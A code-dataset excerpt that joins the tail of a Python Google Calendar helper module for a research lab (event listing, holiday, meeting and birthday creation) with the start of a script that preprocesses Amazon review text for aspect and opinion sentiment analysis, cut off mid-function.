calendar_id\n es.append(nb)\n page_token = events.get('nextPageToken')\n if not page_token:\n break\n\n es.sort(key=lambda x: x.datetime_o)\n return es\n\n\n def get_recurring_events(self, calendar_id, event_id, start_time, end_time, maxResults = None):\n '''A wrapper for events().instances. Returns the list of recurring events for the given calendar alias within the specified timeframe.'''\n es = []\n page_token = None\n while True:\n events = self.service.events().instances(calendarId = self.configured_calendar_ids[calendar_id], eventId = event_id, pageToken=page_token, timeMin = start_time, timeMax = end_time, maxResults = maxResults, showDeleted = False).execute()\n for event in events['items']:\n dt = None\n nb = DeepNonStrictNestedBunch(event)\n assert(not(nb._event))\n nb._event = event # keep the original event as returned in case we want to reuse it e.g. insert it into another calendar\n if nb.start.date:\n dt = dateutil.parser.parse(nb.start.date + 'T00:00:00-08:00')\n elif nb.start.dateTime:\n dt = dateutil.parser.parse(nb.start.dateTime)\n nb.datetime_o = dt\n nb.calendar_id = calendar_id\n es.append(nb)\n page_token = events.get('nextPageToken')\n if not page_token:\n break\n return es\n\n\n # Administration\n #### Quarters and holiday creation: main calendar\n\n\n def add_company_quarter(self, company_name, quarter_name, dt, calendar_id = 'notices'):\n '''Adds a company_name quarter event to the calendar. dt should be a date object. Returns True if the event was added.'''\n\n assert(calendar_id in list(self.configured_calendar_ids.keys()))\n calendarId = self.configured_calendar_ids[calendar_id]\n\n quarter_name = quarter_name.title()\n quarter_numbers = {\n 'Spring' : 1,\n 'Summer' : 2,\n 'Fall' : 3,\n 'Winter' : 4\n }\n assert(quarter_name in list(quarter_numbers.keys()))\n\n start_time = datetime(year=dt.year, month=dt.month, day=dt.day, hour=0, minute=0, second=0, tzinfo=self.timezone) + timedelta(days = -1)\n end_time = start_time + timedelta(days = 3, seconds = -1)\n summary = '%s %s Quarter begins' % (company_name, quarter_name)\n\n # Do not add the quarter multiple times\n events = self.get_events(start_time.isoformat(), end_time.isoformat(), ignore_cancelled = True)\n for event in events:\n if event.summary.find(summary) != -1:\n return False\n\n event_body = {\n 'summary' : summary,\n 'description' : summary,\n 'start' : {'date' : dt.isoformat(), 'timeZone' : self.timezone_string},\n 'end' : {'date' : dt.isoformat(), 'timeZone' : self.timezone_string},\n 'status' : 'confirmed',\n 'gadget' : {\n 'display' : 'icon',\n 'iconLink' : 'https://guybrush.ucsf.edu/images/Q%d_32.png' % quarter_numbers[quarter_name],\n 'title' : summary,\n },\n 'extendedProperties' : {\n 'shared' : {\n 'event_type' : '%s quarter' % company_name,\n 'quarter_name' : quarter_name\n }\n }\n }\n colortext.warning('\\n%s\\n' % pprint.pformat(event_body))\n created_event = self.service.events().insert(calendarId = self.configured_calendar_ids[calendar_id], body = event_body).execute()\n return True\n\n\n def add_holiday(self, start_dt, holiday_name, end_dt = None, calendar_id = 'notices'):\n '''Adds a holiday event to the calendar. start_dt and end_dt (if supplied) should be date objects. Returns True if the event was added.'''\n\n assert(calendar_id in list(self.configured_calendar_ids.keys()))\n calendarId = self.configured_calendar_ids[calendar_id]\n\n # Note: end_date is one day ahead e.g. for the New Years' holiday Dec 31-Jan 1st, we specify the end_date as Jan 2nd. This is what the calendar expects.\n if not end_dt:\n end_dt = start_dt\n start_date = date(year=start_dt.year, month=start_dt.month, day=start_dt.day)#, tzinfo=self.timezone)\n end_date = date(year=end_dt.year, month=end_dt.month, day=end_dt.day) + timedelta(days = 1) #, tzinfo=self.timezone)\n start_time = datetime(year=start_dt.year, month=start_dt.month, day=start_dt.day, hour=0, minute=0, second=0, tzinfo=self.timezone) + timedelta(days = -1)\n end_time = datetime(year=end_dt.year, month=end_dt.month, day=end_dt.day, hour=23, minute=59, second=59, tzinfo=self.timezone) + timedelta(days = 2)\n\n # Do not add the quarter multiple times\n events = self.get_events((start_time + timedelta(days = -1)).isoformat(), (end_time + timedelta(days = 1)).isoformat(), ignore_cancelled = True)\n for event in events:\n if event.summary.find(holiday_name) != -1:\n return False\n\n event_body = {\n 'summary' : holiday_name,\n 'description' : holiday_name,\n 'start' : {'date' : start_date.isoformat(), 'timeZone' : self.timezone_string},\n 'end' : {'date' : end_date.isoformat(), 'timeZone' : self.timezone_string},\n 'status' : 'confirmed',\n 'extendedProperties' : {\n 'shared' : {\n 'event_type' : 'Holiday'\n }\n }\n }\n if abs((end_date - start_date).days) > 7:\n raise Exception('The range of dates from {0} to {1} is greater than expected. Please check to make sure that the dates are correct.'.format(start_date, end_date))\n elif end_date < start_date:\n raise Exception('Error: The end date {1} occurs before the start date ({0}).'.format(start_date, end_date))\n\n created_event = self.service.events().insert(calendarId = self.configured_calendar_ids[calendar_id], body = event_body).execute()\n return True\n\n\n def remove_all_events(self, calendar_id):\n '''Removes all events from a calendar. WARNING: Be very careful using this.'''\n # todo: incomplete\n\n now = datetime.now(tz=self.timezone) # timezone?\n start_time = datetime(year=now.year - 1, month=now.month, day=now.day, hour=now.hour, minute=now.minute, second=now.second, tzinfo=self.timezone)\n end_time = datetime(year=now.year + 1, month=now.month, day=now.day, hour=now.hour, minute=now.minute, second=now.second, tzinfo=self.timezone)\n start_time = start_time.isoformat()\n end_time = end_time.isoformat()\n\n\n #events = self.service.events().list(calendarId = self.configured_calendar_ids[calendar_id], showDeleted = False).execute()\n events = self.service.events().list(calendarId = self.configured_calendar_ids[calendar_id], timeMin = start_time, timeMax = end_time, showDeleted = False).execute()\n\n print((len(events['items'])))\n\n for event in events['items']:\n dt = None\n nb = DeepNonStrictNestedBunch(event)\n #print(event)\n if (nb.summary or nb.description or '').find('presentation') != -1:\n print((nb.id))\n print((nb.summary or nb.description))\n print((nb.start))\n\n\n #### Meetings creation: main calendar\n\n # Tag events. This is all that is needed for the Rosetta development and regular meetings\n def tag_event(self, calendar_id, event_id, extendedProperties):\n '''Add extendedProperties to a meeting. Warning: extendedProperties must contain only shared and private dicts and\n their contents will overwrite anything in the event's extendedProperties i.e. we do *not* deep-merge the dicts.\n '''\n event_body = self.service.events().get(calendarId = self.configured_calendar_ids[calendar_id], eventId=event_id).execute()\n event_body['extendedProperties'] = event_body.get('extendedProperties', {})\n event_body['extendedProperties']['shared'] = event_body['extendedProperties'].get('shared', {})\n event_body['extendedProperties']['private'] = event_body['extendedProperties'].get('private', {})\n assert(sorted(set(extendedProperties.keys()).union(set(['shared', 'private']))) == ['private', 'shared'])\n for k, v in extendedProperties['shared'].items():\n event_body['extendedProperties']['shared'][k] = v\n for k, v in extendedProperties['private'].items():\n event_body['extendedProperties']['private'][k] = v\n raise Exception('not tested yet')\n updated_event = self.service.events().update(calendarId = self.configured_calendar_ids[calendar_id], eventId = event_id, body = event_body).execute()\n\n\n # Lab meetings\n def add_lab_meeting(self, calendar_id, start_dt, end_dt, location, presenters, foodie, summary = None, description = None, visibility = 'default', username_map = {}, email_map = {}):\n e = BasicEvent(self, start_dt, end_dt, location = location, summary = summary, description = description, visibility = visibility, username_map = username_map, email_map = email_map)\n event = e.create_lab_meeting('Lab meeting', presenters, foodie)\n colortext.warning(pprint.pformat(event))\n\n\n # Journal club meetings\n def add_journal_club_meeting(self, calendar_id, start_dt, end_dt, location, presenters, food_vendor, paper = None, summary = None, description = None, visibility = 'default', username_map = {}, email_map = {}):\n e = BasicEvent(self, start_dt, end_dt, location = location, summary = summary, description = description, visibility = visibility, username_map = username_map, email_map = email_map)\n event = e.create_journal_club_meeting(presenters, food_vendor, paper = paper)\n colortext.warning(pprint.pformat(event))\n\n\n # Kortemme/DeGrado labs joint meetings\n def add_kortemme_degrado_joint_meeting(self, calendar_id, start_dt, end_dt, location, presenters, summary = None, description = None, visibility = 'default', username_map = {}, email_map = {}):\n e = BasicEvent(self, start_dt, end_dt, location = location, summary = summary, description = description, visibility = visibility, username_map = username_map, email_map = email_map)\n event = e.create_lab_meeting('Kortemme/DeGrado joint meeting', presenters, locked = True)\n colortext.warning(pprint.pformat(event))\n\n\n #### Meetings creation: notices calendar\n\n\n def add_birthday(self, start_dt, end_dt, location, celebrant, caker, summary = None, description = None, visibility = 'default', username_map = {}, email_map = {}, calendar_id = 'notices'):\n e = BasicEvent(self, start_dt, end_dt, location = location, summary = summary, description = description, visibility = visibility, username_map = username_map, email_map = email_map)\n event_body = e.create_birthday(celebrant, caker)\n created_event = self.service.events().insert(calendarId = self.configured_calendar_ids[calendar_id], body = event_body).execute()\n return created_event\n\n # Deprecated - remove these when we switch over to the new system\n\n # Getters, deleters\n def getAllEvents(self, calendar_id, year = None, month = None):\n # See note above for query parameters\n\n #query = gdata.calendar.client.CalendarEventQuery()\n #query.max_results = 2**31-1\n #query.singleevents = \"true\"\n start_time = None\n end_time = None\n if year:\n if month and (type(month) == type(1)) and month >= 1 and month <=12:\n start_time = \"%d-%d-01T00:00:00-08:00\" % (year, month)\n end_time = \"%d-%d-31T23:59:00-08:00\" % (year, month)\n else:\n start_time = \"%d-01-01T00:00:00-08:00\" % year\n end_time = \"%d-12-31T23:59:00-08:00\" % year\n\n events = self.service.events().list(\n calendarId = self.configured_calendar_ids[calendar_id],\n timeMin = start_time,\n timeMax = end_time,\n singleEvents = True,\n maxResults = 2**31-1,\n showDeleted = False).execute()\n\n #print(query, self.URI)\n #feed = self.client.GetCalendarEventFeed(q=query, uri = self.URI)\n\n #events = []\n #for event in events:\n # events.append(event)\n # eventIDText = event.id.text\n # eventEditURL = event.GetEditLink().href\n # eventHTMLURL = event.GetHtmlLink().href\n return events.get('items')\n\n\n\n def getEventsTable(self, calendar_id, year = None, month = None):\n eventstbl = {}\n events = self.getAllEvents(calendar_id, year, month)\n for event in events:\n event = DeepNonStrictNestedBunch (event)\n if event.start and event.location and event.status != 'cancelled':\n EventTitle = event.summary\n\n if event.start.get('dateTime'):\n startdate = event.start['dateTime']\n startdate = time.strptime(startdate[0:19], '%Y-%m-%dT%H:%M:%S')\n startdate = datetime.fromtimestamp(time.mktime(startdate))\n elif event.start.get('date'):\n startdate = event.start['date']\n startdate = time.strptime(startdate, '%Y-%m-%d')\n startdate = datetime.fromtimestamp(time.mktime(startdate))\n else:\n raise Exception('Cannot determine start date.')\n if event.end.get('dateTime'):\n enddate = event.end['dateTime']\n enddate = time.strptime(enddate[0:19], '%Y-%m-%dT%H:%M:%S')\n enddate = datetime.fromtimestamp(time.mktime(enddate))\n elif event.end.get('date'):\n enddate = event.end['date']\n enddate = time.strptime(enddate, '%Y-%m-%d')\n enddate = datetime.fromtimestamp(time.mktime(enddate))\n else:\n raise Exception('Cannot determine end date.')\n\n isBirthday = EventTitle.find(\"birthday\") != -1\n\n location = event.get('location')\n eventstbl[(startdate, EventTitle)] = {\"event\": event, \"enddate\" : enddate, \"location\" : location, \"title\" : EventTitle}\n #for k in sorted(eventstbl.keys()):\n #\tprint(k, eventstbl[k][\"title\"])\n return eventstbl\n\n def updateEvents(self, calendar_id, newEvents):\n currentEvents = self.getEventsTable(calendar_id)\n\n #colortext.message(newEvents)\n #colortext.warning(currentEvents)\n\n # Events to remove\n toRemove = []\n for startdateTitle, event in sorted(currentEvents.items()):\n if event[\"title\"].find(\"birthday\") != -1:\n # Don't remove birthdays\n continue\n if newEvents.get(startdateTitle):\n newEvent = newEvents[startdateTitle]\n if newEvent[\"enddate\"] == event[\"enddate\"]:\n if event[\"location\"].startswith(newEvent[\"location\"]):\n if str(newEvent[\"title\"]) == str(event[\"title\"]):\n # Don't remove events which are in both newEvents and the calendar\n continue\n\n # Remove events which are on the calendar but not in newEvents\n toRemove.append(startdateTitle)\n\n # Events to add\n toAdd = []\n for startdateTitle, event in sorted(newEvents.items()):\n if currentEvents.get(startdateTitle):\n currentEvent = currentEvents[startdateTitle]\n if currentEvent[\"enddate\"] == event[\"enddate\"]:\n if currentEvent[\"location\"].startswith(event[\"location\"]):\n if str(currentEvent[\"title\"]) == str(event[\"title\"]):\n # Don't add events which are in both newEvents and the calendar\n continue\n # Add events which are in newEvents but not on the calendar\n toAdd.append(startdateTitle)\n\n if toRemove:\n colortext.error(\"Removing these %d events:\" % len(toRemove))\n for dtTitle in toRemove:\n colortext.warning(dtTitle)\n self.removeEvent(calendar_id, currentEvents[dtTitle][\"event\"].id)\n\n if toAdd:\n colortext.message(\"Adding these %d events:\" % len(toAdd))\n for dtTitle in toAdd:\n newEvent = newEvents[dtTitle]\n #print(dtTitle, newEvent)\n self.addNewEvent(calendar_id, dtTitle[0], newEvent[\"enddate\"], newEvent[\"location\"], newEvent[\"title\"])\n\n def removeEvent(self, calendar_id, event_id):\n for i in range(3):\n try:\n assert(self.service.events().get(calendarId = self.configured_calendar_ids[calendar_id], eventId = event_id).execute())\n self.service.events().delete(calendarId = self.configured_calendar_ids[calendar_id], eventId = event_id).execute()\n break\n except Exception as e:\n colortext.error(\"An error occurred:\")\n colortext.error(e)\n colortext.error(\"Trying again.\")\n time.sleep(2)\n\n def addNewEvent(self, calendar_id, startdate, enddate, location, title):\n colortext.message(\"\\nAdding %s on %s at %s\" % (title, startdate, location))\n\n #start_time = startdate.strftime('%Y-%m-%dT%H:%M:%S').isoformat()\n #end_time =\t enddate.strftime('%Y-%m-%dT%H:%M:%S').isoformat()\n start_time = startdate.isoformat()\n end_time =\t enddate.isoformat()\n\n loc = location\n if loc.startswith(\"Tahoe\"):\n loc = \"%s, 10 minutes outside Truckee, CA @ 39.328455,-120.184078\" % loc\n else:\n if location.startswith(\"BH \"):\n loc = \"%s, Byers Hall\" % loc\n loc = \"%s, removeEvent/Mission Bay, San Francisco, CA @ 37.767952,-122.392214\" % loc\n\n for i in range(3):\n try:\n self.service.events().insert(\n calendarId = self.configured_calendar_ids[calendar_id],\n body = {\n \"start\" : {\n \"timeZone\" : self.timezone_string,\n \"dateTime\" : start_time,\n },\n \"end\" : {\n \"timeZone\" : self.timezone_string,\n \"dateTime\" : end_time,\n },\n \"location\" : loc,\n \"summary\" : title,\n \"description\" : title\n }).execute()\n break\n except Exception as e:\n colortext.error(\"An error occurred:\")\n colortext.error(traceback.format_exc())\n colortext.error(e)\n colortext.error(\"Trying again.\")\n time.sleep(2)\n\n\n ### Birthdays - rewrite these functions\n\n def add_bidet(self):\n raise Exception('update')\n main_calendar = GoogleCalendar.from_file('/admin/calendars.json', ['main'])\n notices_calendar = GoogleCalendar.from_file('/admin/calendars.json', ['notices'])\n timezone = main_calendar.timezone\n event_ids = set()\n seen_notices = set()\n for year in range(2014, 2017):\n #for year in range(2014, 2015):\n colortext.message('\\n\\nTagging events in %d:\\n' % year)\n extra_days = 0\n if year % 4 == 0:\n extra_days = 1\n start_time = datetime(year=year, month=1, day=1, hour=0, minute=0, second=0, tzinfo=timezone)\n end_time = start_time + timedelta(days = 730 + extra_days, seconds = -1)\n start_time, end_time = start_time.isoformat(), end_time.isoformat()\n\n #main_meetings = main_calendar.get_events(start_time, end_time, ignore_cancelled = True, get_recurring_events_as_instances = False)\n #for m in main_meetings:\n # if m.extendedProperties.shared:\n # event_type = m.extendedProperties.shared['event_type']\n # if event_type == 'Birthday'\n\n notices = notices_calendar.get_events(start_time, end_time, ignore_cancelled = True, get_recurring_events_as_instances = False)\n for n in notices:\n if n.id in seen_notices:\n continue\n seen_notices.add(n.id)\n if n.extendedProperties.shared and n.extendedProperties.shared.event_type:\n event_type = n.extendedProperties.shared['event_type']\n if event_type == 'Birthday':\n print((n.summary, n.id))\n print((n.start))\n event_body = main_calendar.service.events().get(calendarId = main_calendar.configured_calendar_ids[\"notices\"], eventId=n.id).execute()\n event_body['gadget'] = {\n 'display' : 'icon',\n 'iconLink' : 'https://guybrush.ucsf.edu/images/cake.png',\n 'title' : n.summary,\n #'type' : 'application/x-google-gadgets+xml',\n }\n created_event = main_calendar.service.events().update(calendarId = main_calendar.configured_calendar_ids[\"notices\"], eventId = n.id, body = event_body).execute()\n\n\n\n def updateBirthdays(self, bdays):\n raise Exception('update')\n eventstbl = self.getEventsTable(\"main\")\n for dt, details in sorted(bdays.items()):\n bdaykey = datetime(dt.year, dt.month, dt.day)\n if eventstbl.get((bdaykey, details[\"title\"])):\n if str(eventstbl[(bdaykey, details[\"title\"])][\"title\"]) == str(details[\"title\"]):\n continue\n colortext.message(\"adding \" + details[\"title\"])\n self.addBirthday(dt, details[\"title\"], details[\"location\"])\n\n def addBirthday(self, dt, title, location):\n raise Exception('update')\n #if recurrence_data is None:\n # recurrence_data = ('DTSTART;VALUE=DATE:20070501\\r\\n'\n #\t+ 'DTEND;VALUE=DATE:20070502\\r\\n'\n #\t+ 'RRULE:FREQ=WEEKLY;BYDAY=Tu;UNTIL=20070904\\r\\n')\n raise Exception('add this functionality')\n dtstart =\"DATE:%d%0.2d%0.2dT070000\" % (dt.year, dt.month, dt.day)\n dtend =\"DATE:%d%0.2d%0.2dT235900\" % (dt.year, dt.month, dt.day)\n untildt =\"%d%0.2d%0.2d\" % (dt.year + 10, dt.month, dt.day)\n\n recurrence_data = ('DTSTART;VALUE=%s\\r\\n' % dtstart) + ('DTEND;VALUE=%s\\r\\n' % dtend) + ('RRULE:FREQ=YEARLY;UNTIL=%s\\r\\n' % untildt)\n\n event = gdata.calendar.data.CalendarEventEntry()\n event.title = atom.data.Title(text=title)\n event.content = atom.data.Content(text=title)\n event.where.append(gdata.calendar.data.CalendarWhere(value=location))\n\n # Set a recurring event\n event.recurrence = gdata.data.Recurrence(text=recurrence_data)\n self.addEvent(event)\n\n # Utility functions\n def printAllEvents(self, calendar_id, year = None):\n colortext.message('Events on Calendar: %s' % (self.get_calendar(calendar_id).summary))\n eventstbl = self.getEventsTable(calendar_id, year)\n for startdateTitle, details in sorted(eventstbl.items()):\n startdate = startdateTitle[0]\n print(((\"%s -> %s at %s: %s\" % (startdate, details[\"enddate\"], details[\"location\"][0:details[\"location\"].find(\"@\")], details[\"title\"])).encode('ascii', 'ignore')))\n\n\n\n\n def remove_all_cancelled_events(self, calendar_ids = []):\n\n for calendar_id in calendar_ids or self.calendar_ids:\n colortext.message('Removing cancelled events in %s' % calendar_id)\n events = self.service.events().list(calendarId = self.configured_calendar_ids[calendar_id]).execute()\n print((len(events['items'])))\n\n for event in events['items']:\n dt = None\n nb = DeepNonStrictNestedBunch(event)\n if nb.status == 'cancelled':\n if nb.recurringEventId:\n colortext.warning(nb.recurringEventId)\n # Retrieve all occurrences of the recurring event within the timeframe\n start_time = datetime(year=2010, month=1, day=1, tzinfo=self.timezone).isoformat()\n end_time = datetime(year=2015, month=1, day=1, tzinfo=self.timezone).isoformat()\n for e in self.get_recurring_events(calendar_id, nb.id, start_time, end_time, maxResults = 10):\n print(e)\n else:\n colortext.warning(nb)\n\n\nif __name__ == '__main__':\n import pprint\n gc = GoogleCalendar.from_file('test.json', ['main', 'rosetta_dev', 'regular_meetings', 'vacations'])\n\n tests = ['events']\n #'admin'\n # acl\n if 'acl' in tests:\n gc.get_calendar_users('main')\n\n # calendarList\n if 'calendarList' in tests:\n gc.get_calendars()\n v = gc.get_calendar('vacations')\n colortext.message('Description: %s' % v.description)\n colortext.warning('Role: %s' % v.accessRole)\n colortext.warning('Time zone: %s' % v.timeZone)\n\n # colors\n if 'colors' in tests:\n gc.get_colors()\n\n # events\n if 'events' in tests:\n for evnt in gc.get_upcoming_events_within_the_current_month():\n pass\n #print(evnt.datetime_o, evnt.description, evnt.location)\n\n colortext.warning('***')\n for evnt in gc.get_events_within_a_given_month(2014, 12):\n pass\n #print(evnt)\n #colortext.warning('%s, %s, %s' % (evnt.datetime_o, evnt.description or evnt.summary, evnt.location))\n\n colortext.warning('***')\n\n todays_events, this_weeks_events, this_months_events = gc.get_upcoming_event_lists_for_the_remainder_of_the_month(year = 2014, month = 12)\n sys.exit(0)\n colortext.warning(\"*** Today's events ***\")\n for evnt in todays_events:\n print((evnt.datetime_o, evnt.description, evnt.location))\n colortext.warning(\"*** This week's events ***\")\n for evnt in this_weeks_events:\n print((evnt.datetime_o, evnt.description, evnt.location))\n colortext.warning(\"*** This month's events ***\")\n for evnt in this_months_events:\n print((evnt.datetime_o, evnt.description, evnt.location))\n\n # admin\n if 'admin' in tests:\n gc.remove_all_cancelled_events()\n\n","repo_name":"Kortemme-Lab/klab","sub_path":"klab/google/gcalendar.py","file_name":"gcalendar.py","file_ext":"py","file_size_in_byte":43995,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"10897686873","text":"import os\nimport csv\nimport argparse\nimport pandas as pd\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nfrom collections import Counter\nfrom textblob import TextBlob\nfrom tqdm import tqdm\nfrom math import exp\nfrom itertools import chain\n\n\ndef parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument('-i', '--input', type=str,\n help='Input data - amazon reviews data .json.gz')\n parser.add_argument('-c', '--concepts', type=str,\n default='~/data/data-concept/data-concept-instance-relations.txt')\n parser.add_argument('-p', '--positive_opinions', type=str,\n default='~/data/opinion-lexicon-English/positive-words.txt')\n parser.add_argument('-n', '--negative_opinions', type=str,\n default='~/data/opinion-lexicon-English/negative-words.txt')\n parser.add_argument('-o', '--out', type=str,\n help='Output directory, final output including: rating.txt, sentiment.txt')\n parser.add_argument('--num_top_freq_aspect', type=int, default=2000)\n parser.add_argument('--num_top_corr_aspect', type=int, default=500)\n return parser.parse_args()\n\n\ndef parse_line(line, n_grams=[1, 2, 3, 4]):\n tokens = word_tokenize(line)\n results = []\n for i in n_grams:\n if i == 1:\n results += tokens\n elif len(tokens) >= i:\n results += [' '.join(tokens[j:j+i])\n for j in range(len(tokens) - i + 1)]\n return results\n\n\ndef get_sentiment(polarity):\n if polarity > 0:\n return 1\n elif polarity < 0:\n return -1\n return 0\n\n\ndef compute_feature_quality_score(sentiment, N=5):\n return 1. + (N - 1) / (1 + exp(-sentiment))\n\n\ndef chainer(s, sep=','):\n return list(chain.from_iterable(s.str.split(sep)))\n\n\ndef most_frequent(elements, counter, exclude=[]):\n element_freq = [counter[element] for element in elements if element not in exclude]\n if len(element_freq) == 0:\n return None\n return elements[element_freq.index(max(element_freq))]\n\n\ndef main(args):\n if not os.path.exists(args.out):\n os.makedirs(args.out)\n # load data\n print('Load data')\n df = pd.read_json(args.input, lines=True)\n print('Export ratings')\n ratings = df.loc[:, ['reviewerID', 'asin', 'overall', 'unixReviewTime']]\n ratings.to_csv(\n os.path.join(args.out, 'rating.txt'), header=False, index=False)\n ratings['id'] = ratings['reviewerID'].map(\n str) + '-' + ratings['asin'].map(str)\n ratings = ratings.set_index('id')\n print('Export text')\n reviews = df[['reviewerID', 'asin', 'reviewText']]\n print('Lowercase all text')\n df['reviewText'] = df['reviewText'].str.lower()\n reviews.to_csv(os.path.join(\n args.out, 'review.txt'), sep='\\t', header=False, index=False)\n print('Load concepts')\n concepts = pd.read_csv(args.concepts, header=None, sep='\\t')\n concepts = list(set(concepts[0].tolist() + concepts[1].tolist()))\n print('Exclude stopwords')\n stop_words = set(stopwords.words('english'))\n concepts = [tok for tok in concepts if tok not in stop_words]\n all_text = ' '.join(df['reviewText'].tolist())\n tokens = [tok for tok in parse_line(all_text, n_grams=[1])]\n token_counter = Counter(tokens)\n concept_freq = pd.DataFrame(data={'concept': concepts})\n concept_freq['count'] = concept_freq['concept'].map(token_counter)\n print('Sort concept descending order')\n concept_freq = concept_freq.sort_values(\n by=['count'], ascending=False).reset_index(drop=True)\n print('Backup concepts count')\n concept_freq.to_csv(os.path.join(\n args.out, 'concept.cnt'), header=False, index=False)\n print('Export top %d concepts' % args.num_top_freq_aspect)\n top_freq_aspects = concept_freq[:args.num_top_freq_aspect]\n top_freq_aspects.to_csv(os.path.join(\n args.out, 'top_freq_aspects.txt'), header=False, index=False)\n top_freq_aspects = top_freq_aspects['concept'].tolist()\n # Exporting sentence sentiment\n with open(os.path.join(args.out, 'sentences.txt'), 'w') as f:\n for _, row in tqdm(df.iterrows(), desc='Exporting sentence sentiment'):\n review = TextBlob(row['reviewText'])\n for sentence in review.sentences:\n s = sentence.tokens\n if len(s) > 0 and s[-1] == '.':\n s.remove('.') # remove fullstop\n if len(s) > 0:\n s = ' '.join(s)\n f.write('{}\\t{}\\t{}\\t{}\\n'.format(\n row['reviewerID'], row['asin'], s, get_sentiment(sentence.sentiment.polarity)))\n # Load sentences\n sentence_df = pd.read_csv(os.path.join(args.out, 'sentences.txt'), sep='\\t', header=None,\n names=['reviewerID', 'asin', 'sentence', 'sentiment'])\n # Exporting aspect sentiment\n with open(os.path.join(args.out, 'aspect_sentiment.txt'), 'w') as f:\n for user, item, sentence, sentiment in tqdm(zip(sentence_df['reviewerID'], sentence_df['asin'], sentence_df['sentence'], sentence_df['sentiment']), desc='Exporting aspect sentiment'):\n for tok in parse_line(str(sentence), n_grams=[1]):\n if tok in top_freq_aspects:\n f.write('{}\\t{}\\t{}\\t{}\\t{}\\n'.format(\n user, item, sentence, tok, sentiment))\n # Load aspect sentiment\n aspect_sentiments = pd.read_csv(os.path.join(args.out, 'aspect_sentiment.txt'), sep='\\t',\n usecols=[0, 1, 3, 4], header=None,\n names=['reviewerID', 'asin', 'aspect', 'sentiment'])\n print('compute user, item aspect sentiment')\n aspect_sentiments = aspect_sentiments.groupby(\n by=['reviewerID', 'asin', 'aspect']).sum().reset_index()\n tqdm.pandas(desc='compute aspect score')\n aspect_sentiments['aspect_score'] = aspect_sentiments['sentiment'].progress_apply(\n lambda x: compute_feature_quality_score(x))\n print('export aspect scores to file')\n aspect_sentiments.to_csv(os.path.join(\n args.out, 'aspect_scores.csv'), index=False)\n aspect_sentiments['id'] = aspect_sentiments['reviewerID'].map(\n str) + '-' + aspect_sentiments['asin'].map(str)\n ratings['id'] = ratings['reviewerID'].map(\n str) + '-' + ratings['asin'].map(str)\n ratings = ratings.set_index('id')\n print('map ratings')\n aspect_sentiments['overall'] = aspect_sentiments['id'].map(\n ratings['overall'])\n print('compute correlation')\n aspect_sentiments = aspect_sentiments[aspect_sentiments['overall'].notnull(\n )]\n rating_aspect_correlations = aspect_sentiments.groupby(by=['aspect'])[['overall', 'aspect_score']].corr(\n method='pearson').iloc[0::2, -1].reset_index()[['aspect', 'aspect_score']].sort_values(by=['aspect_score'], ascending=False).reset_index(drop=True)\n print('export rating aspect correlation scores to file')\n rating_aspect_correlations.to_csv(os.path.join(\n args.out, 'rating_aspect_correlations.csv'), index=False, header=False)\n print('export top {} aspects to file'.format(args.num_top_corr_aspect))\n top_corr_aspects = rating_aspect_correlations[:args.num_top_corr_aspect]\n top_corr_aspects[['aspect']].to_csv(\n os.path.join(args.out, 'top_correlated_aspects.txt'), index=False, header=False)\n top_corr_aspects = set(top_corr_aspects['aspect'].tolist())\n # Load opinions\n opinions = set(pd.read_csv(args.positive_opinions, header=None)[\n 0].tolist() + pd.read_csv(args.negative_opinions, header=None)[0].tolist())\n with open(os.path.join(args.out, 'sentence_aspect_opinion_sentiments.txt'), 'w') as f:\n fieldnames = ['reviewerID', 'asin', 'sentence', 'aspect',\n 'aspect_count', 'opinion', 'opinion_count', 'sentiment']\n writer = csv.DictWriter(f, fieldnames=fieldnames)\n writer.writeheader()\n for user, item, sentence, sentiment in tqdm(zip(sentence_df['reviewerID'], sentence_df['asin'], sentence_df['sentence'], sentence_df['sentiment']), total=len(sentence_df), desc='Exporting sentence aspect opinion'):\n sentence_aspects = set()\n sentence_opinions = set()\n for tok in parse_line(str(sentence).lower(), n_grams=[1]):\n if tok in opinions:\n sentence_opinions.add(tok)\n elif tok in top_corr_aspects:\n sentence_aspects.add(tok)\n if len(sentence_aspects) > 0 and len(sentence_opinions) > 0:\n writer.writerow({\n 'reviewerID': user,\n 'asin': item,\n 'sentence': sentence,\n 'aspect': '|'.join(list(sentence_aspects)),\n 'aspect_count': len(sentence_aspects),\n 'opinion': '|'.join(list(sentence_opinions)),\n 'opinion_count': len(sentence_opinions),\n 'sentiment': sentiment\n })\n # Export data\n data_df = pd.read_csv(os.path.join(args.out, 'sentence_aspect_opinion_sentiments.txt'))\n data_df = data_df[data_df['aspect'].notnull() & data_df['opinion'].notnull()]\n aspects = chainer(data_df['aspect'], '|')\n aspect_counter = Counter(aspects)\n opinions = chainer(data_df['opinion'], '|')\n opinion_counter = Counter(opinions)\n tqdm.pandas(desc='Spliting aspect')\n data_df['split_aspect'] = data_df['aspect'].progress_apply(lambda x: str(x).split('|'))\n tqdm.pandas(desc='Choosing most freq aspect')\n data_df['most_freq_aspect'] = data_df['split_aspect'].progress_apply(lambda x: most_frequent(x, aspect_counter))\n data_df['split_opinion'] = data_df['opinion'].apply(lambda x: str(x).split('|'))\n data_df['most_freq_opinion'] = data_df.apply(lambda row: most_frequent(row['split_opinion'], opinion_counter, row['most_freq_aspect'].split() + [row['most_freq_aspect']]), axis=1)\n print('Filter sentences without opinion')\n data_df = data_df[data_df['most_freq_opinion'].notnull()]\n data_df['aspect_term'] = data_df['most_freq_aspect'].apply(lambda x: '_'.join(str(x).split()))\n data_df['opinion_term'] = data_df['most_freq_opinion'].apply(lambda x: '_'.join(str(x).split()))\n data_df['sentence'] = data_df.apply(lambda row: ' '.join(word_tokenize(str(row['sentence']).replace(row['most_freq_aspect'], row['aspect_term']).replace(row['most_freq_opinion'], row['opinion_term']))), axis=1)\n data_df['aspect'] = data_df['aspect_term']\n data_df['opinion'] = data_df['opinion_term']\n tqdm.pandas(desc='Locating aspect position')\n data_df['aspect_pos'] = data_df.progress_apply(lambda row: word_tokenize(row['sentence']).index(str(row['aspect'])), axis=1)\n tqdm.pandas(desc='Locating opinion position')\n data_df['opinion_pos'] = data_df.progress_apply(lambda row: word_tokenize(row['sentence']).index(str(row['opinion'])), axis=1)\n tqdm.pandas(desc='Getting sentence length')\n data_df['sentence_len'] = data_df['sentence'].progress_apply(lambda x: len(str(x).split()))\n print('Export sentence with aspect and opinion positions to file')\n 